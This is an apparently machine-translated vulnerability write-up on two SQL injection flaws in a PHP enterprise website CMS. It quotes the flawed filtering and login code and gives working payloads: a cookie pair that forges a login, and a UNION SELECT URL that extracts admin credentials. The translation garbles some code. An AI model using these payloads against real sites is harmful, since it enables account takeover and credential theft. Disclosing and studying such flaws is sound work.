Two SQL injection points for a general enterprise website construction system

Two SQL injection points for a general enterprise website construction system

Rookie enterprise website system PHP version is a simple and easy-to-use PHP enterprise website system for secondary development. Mysql and Access databases are available when the system is installed. The backend has complete functions, simple operations, good scalability, and high security. The front-end can be set to display multiple languages at the same time, it is suitable for foreign trade enterprises to build websites. The system uses the famous PHP template engine Smarty. Developers familiar with Smarty can easily and quickly create sinsiu templates.

SQL #1



/Include/function. php
 

Function strict ($ str) {if (S_MAGIC_QUOTES_GPC) {$ str = stripslashes ($ str); if gpc is used, remove the Escape Character (intentionally injecting it to us ...)} $ Str = str_replace ('<', '& #60;', $ str); $ str = str_replace ('>', '& #62;', $ str ); $ str = str_replace ('? ',' & #63; ', $ str); $ str = str_replace (' % ',' & #37; ', $ str ); $ str = str_replace (chr (39), '& #39;', $ str); $ str = str_replace (chr (34), '& #34 ;', $ str); $ str = str_replace (chr (13 ). chr (10), '<br/>', $ str); return $ str;/filter some characters. The single quotation marks are missing}

The fields where parameters are submitted at the front end are urlencode and then brought into the database (here we will talk about it later). With this point, only one place can be injected.

Same file

function check_user_login(){global $user_id;$username = get_cookie('user_username');$password = get_cookie('user_password');if($username != '' && $password != ''){$obj = new users();$obj->set_field('use_id');$obj->set_where("use_username = '$username'");$obj->set_where("use_password = '$password'");$one = $obj->get_one();if(count($one) !== 0){$user_id = $one['use_id'];return intval($user_id);}else{return 0;}}else{return 0;}}

We modify cookie

user_username = aa\  ;user_password=or use_id = 1 %23

Check the SQL log. The executed statement is

Arbitrary User Login can be forged, and no error is reported, so blind injection,



SQL #2 (pseudo-static injection)

/Index/search. php


 

set_smarty();load_lang_pack(array($global['channel']));initial('index');if(isset($global['key'])){$smarty->assign('page_title',rawurldecode($global['key']));}$smarty->display('search.php');

Here, our data url encoding is decoded again. Lead to single quotes,

The default database structure on the official website is exp
 

?/search/index.html/key-%%27%20union%20select%20adm_username,adm_password,3%20from%20php_admin%23/

 

Keywords

Powered by sinsiu Guangdong ICP standby No. 12345678

Exist? /Search/page can be injected (two versions are available, but no injection is available in asp)
 

We recommend that you use sqlmap for testing.



Five instances are provided to prove their versatility.
 

 

 

 

 

 

Solution:

Filter